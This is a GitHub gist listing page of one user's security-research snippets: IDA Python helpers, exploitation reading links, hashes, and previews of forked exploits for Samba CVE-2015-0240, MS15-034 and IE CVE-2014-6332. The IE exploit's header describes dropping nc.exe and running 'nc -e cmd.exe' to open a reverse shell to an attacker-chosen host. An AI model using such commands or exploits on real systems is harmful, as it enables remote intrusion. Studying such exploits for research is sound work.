Skip to content

Instantly share code, notes, and snippets.

View huyna's full-sized avatar

huyna

7 followers · 5 following
View GitHub Profile
@huyna
huyna / gist:41a8579ed9d86cf770f3
Created February 26, 2016 03:44 — forked from bNull/gist:6003874
IDA Python script that will allow you to highlight a range of bytes and turn it into dwords (for manually fixing up tables or whatever).
# hotkey_utils.py - bNull
#
# Some useful shortcuts for binding to hotkeys. Current output/hotkeys:
#
# [+] Bound make_dwords to Ctrl-Alt-D
# [+] Bound make_cstrings to Ctrl-Alt-A
# [+] Bound make_offset to Ctrl-Alt-O
import idaapi
import idc
@huyna
huyna / 123414
Created February 18, 2016 08:57
https://drive.google.com/file/d/0B9Cw8k5__G16c05aeG81QjVRRlk/view?pref=2&pli=1
@huyna
huyna / 26-01-16
Created January 26, 2016 12:22
http://securityintelligence.com/memgc-use-after-free-exploit-mitigation-in-edge-and-ie-on-windows-10/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+SecurityIntelligence+%28Security+Intelligence%29
http://blogs.technet.com/b/srd/archive/2016/01/12/triaging-the-exploitability-of-ie-edge-crashes.aspx
http://expdev-kiuhnm.rhcloud.com/2015/05/19/mona-2/
https://www.corelan.be/index.php/2014/08/16/analyzing-heap-objects-with-mona-py/
https://www.corelan.be/index.php/2013/01/18/heap-layout-visualization-with-mona-py-and-windbg/
https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/
@huyna
huyna / Linux kernel exploit notes
Created January 26, 2016 01:19
ret2usr
https://tc.gtisc.gatech.edu/bss/2014/r/ret2dir-slides.pdf
@huyna
huyna / 122313
Last active December 25, 2015 08:29
1449130208829
@huyna
huyna / cve-2015-0240_samba_exploit.py
Created December 15, 2015 02:38 — forked from worawit/cve-2015-0240_samba_exploit.py
Exploit for Samba vulnerabilty (CVE-2015-0240)
#!/usr/bin/python
"""
Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya
The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by
ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'
in libtalloc does not write a value on 'creds' address.
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
@huyna
huyna / http_sys_pseudo.c
Created December 15, 2015 02:37 — forked from worawit/http_sys_pseudo.c
MS15-034 (CVE-2015-1635) PoCs
/*
Pseudo code in HTTP.sys to understand flow related to MS15-034
All pseudo code are reversed from vulnerable HTTP.sys on Windows 7 SP1 x86
For anyone want to know what function are patched.
Just open patched version and find all functions reference to RtlULongLongAdd().
*/
@huyna
huyna / cve-2014-6332_exploit.html
Created December 15, 2015 02:34 — forked from worawit/cve-2014-6332_exploit.html
CVE-2014-6332 IE exploit to get shell (packed everything in one html)
<html>
<head>
<!--
CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell
The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in javascript below determined the connect back target
Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windoes 8.1 64-bit (EPM is off)
@huyna
huyna / hash
Last active November 12, 2015 08:30
3B9DCDD69AC7615CD0E2941DC8E23DDF
5730866B34EF589BD398C9A9B6D7E307
7D71593A7D159C754055E16C26B844112E7B4132
@huyna
huyna / idapython_struct.py
Created October 26, 2015 06:49
#---------------------------------------------------------------------
# Structure test
#
# This script demonstrates how to create structures and populate them
# with members of different types.
#
# Author: Gergely Erdelyi <[email protected]>
#---------------------------------------------------------------------
from idaapi import stroffflag, offflag